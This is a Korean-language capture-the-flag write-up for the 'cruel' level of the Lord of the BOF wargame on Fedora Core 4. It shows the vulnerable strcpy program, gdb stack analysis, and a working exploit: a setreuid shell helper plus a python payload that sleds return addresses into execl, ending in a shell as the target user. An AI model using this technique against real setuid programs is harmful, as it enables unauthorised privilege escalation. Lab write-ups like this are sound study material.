[ Fedora Core 4 ] dark_stone -> cruel

/*

        The Lord of the BOF : The Fellowship of the BOF

        - cruel

        - Local BOF on Fedora Core 4

        - hint : no more fake ebp, RET sleding on random library

*/

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

int main(int argc, char *argv[])

{

    char buffer[256];

    if(argc < 2){

        printf("argv error\n");

        exit(0);

    }

    strcpy(buffer, argv[1]);

    printf("%s\n", buffer);

}

주어진 힌트대로 풀자면 random library 주소가 ebp+8이 될때까지 ret sleding으로 esp를 내리고 execl을 호출하면 된다.

물론 그전에 그 library주소가 가진 기계어 값을 이름으로가진 쉘을 띄워주는 프로그램이 준비돼있어야함.

//buffer+dummy의 크기

(gdb) x/24 $esp

0xbfaf9860:     0x0804824a      0x00000000      0x0d696910      0x00000003

0xbfaf9870:     0x007a932c      0x007b197c      0x44444444      0x00000700

0xbfaf9880:     0x00000000      0x00000000      0xb7ff9664      0x00000002

0xbfaf9890:     0x00000000      0x00000000      0x00000000      0x007a2fb4

0xbfaf98a0:     0x007a3878      0x0804824a      0xbfaf998c      0x007918fb

0xbfaf98b0:     0xbfaf9978      0x007a3828      0x00000001      0xb7ff9690

(gdb) x $ebp

0xbfaf9978:     0xbfaf99d8

0xbfaf9978-0xbfaf9878=0x100(256byte)

//ebp+8로 쓸 주소의 위치

(gdb) x/24x $ebp

0xbfaf9978:     0xbfaf99d8      0x007bad7f      0x00000002      0xbfaf9a04

0xbfaf9988:     0xbfaf9a10      0xbfaf99c0      0x00795898      0x007a3878

0xbfaf9998:     0xb7ff9690      0x00000001      0x008caff4      0x007a2ca0

0xbfaf99a8:     0x08048454      0xbfaf99d8      0xbfaf9980      0x007bad44

0xbfaf99b8:     0x00000000      0x00000000      0x00000000      0x0079ae60

0xbfaf99c8:     0x0079613d      0x007a2fb4      0x00000002      0x08048340

//ebp+8의 내용

(gdb) x/3 0x007bad44

0x7bad44 <__libc_start_main+164>:       0x5375c085      0x0054a165      0x45890000   

(null 까지만)

//execl의 주소

(gdb) p execl

$1 = {<text variable, no debug info>} 0x832d68 <execl>

//ret의 주소

(gdb) disassemble main

Dump of assembler code for function main:

0x080483e4 <main+0>:    push   %ebp

...

0x0804843e <main+90>:   sub    $0xc,%esp

0x08048441 <main+93>:   lea    0xffffff00(%ebp),%eax

0x08048447 <main+99>:   push   %eax

0x08048448 <main+100>:  call   0x80482f0

0x0804844d <main+105>:  add    $0x10,%esp

0x08048450 <main+108>:  leave

0x08048451 <main+109>:  ret

0x08048452 <main+110>:  nop

0x08048453 <main+111>:  nop

그럼 이제 쉘을 띄워주는 프로그램을 '0x54a1655375c085'란 이름으로 만들고

ebp+8이 0xbfaf99b4가 되도록 ret을 12번 실행해준 후 execl을 실행하면 되겠다.

페이로드는 ..

[ dummy( 260 ) | RET x 12 | execl ]

--풀이--

[dark_stone@Fedora_2ndFloor ~]$ cat ./t.c

#include <stdio.h>

int main(){

        setreuid(501,501);

        system("/bin/sh");

        return 0;

}

[dark_stone@Fedora_2ndFloor ~]$ gcc ./t.c -o ./`printf "\x85\xc0\x75\x53\x65\xa1\x54"`

[dark_stone@Fedora_2ndFloor ~]$

[dark_stone@Fedora_2ndFloor ~]$ ./cruel `python -c 'print "A"*260+"\x51\x84\x04\x08"*12+"\x68\x2d\x83\x00"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQQQQQQQQQQQQh-ƒ

sh-3.00$ id

uid=501(cruel) gid=500(dark_stone) groups=500(dark_stone) context=user_u:system_r:unconfined_t

sh-3.00$ my-pass

euid = 501

---- --- ---- ----